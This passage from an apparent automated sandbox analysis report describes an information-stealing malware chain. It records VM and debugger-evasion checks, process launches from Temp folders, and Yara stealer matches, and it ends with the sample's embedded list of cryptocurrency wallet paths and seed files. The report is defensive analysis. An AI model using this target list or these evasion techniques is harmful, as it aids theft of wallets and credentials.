Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.00000000012DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: AKFHDBFI.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: AKFHDBFI.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: AKFHDBFI.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: EHDHDHIECG.exe, 00000006.00000003.2246638604.00000000013CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: AKFHDBFI.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: AKFHDBFI.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: AKFHDBFI.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: AKFHDBFI.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: AKFHDBFI.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: explorti.exe, 0000000D.00000002.3230163969.000000000125C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWC
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Code function: 6_2_05320823 rdtsc 6_2_05320823
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C375FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C375FF0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C37C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C37C410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004D643B mov eax, dword ptr fs:[00000030h] 13_2_004D643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004DA1A2 mov eax, dword ptr fs:[00000030h] 13_2_004DA1A2
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C34B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C34B66C
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C34B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C34B1F7
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe"
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGCGHCBKFC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe "C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe"
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe "C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe"
Source: EHDHDHIECG.exe, EHDHDHIECG.exe, 00000006.00000002.2284909895.00000000008D4000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: 2@~Program Manager
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C34B341 cpuid 0_2_6C34B341
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3135A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C3135A0
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1DE0 GetUserNameA, 14_2_7EAE1DE0
Source: Amcache.hve.4.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 10.2.explorti.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.EHDHDHIECG.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.explorti.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.explorti.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000003.2697614197.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2284848732.00000000006D1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2194479080.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2326220541.00000000004A1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2316173620.00000000004A1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2285765629.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3228822422.00000000004A1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2275708429.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.a3b2c9311b.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2767076722.0000000000061000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2169837942.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2171110129.0000000001FEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2770510086.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ukuWaeRgPR.exe PID: 6340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a3b2c9311b.exe PID: 3448, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.a3b2c9311b.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2767076722.0000000000061000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2169837942.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ukuWaeRgPR.exe PID: 6340, type: MEMORYSTR
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
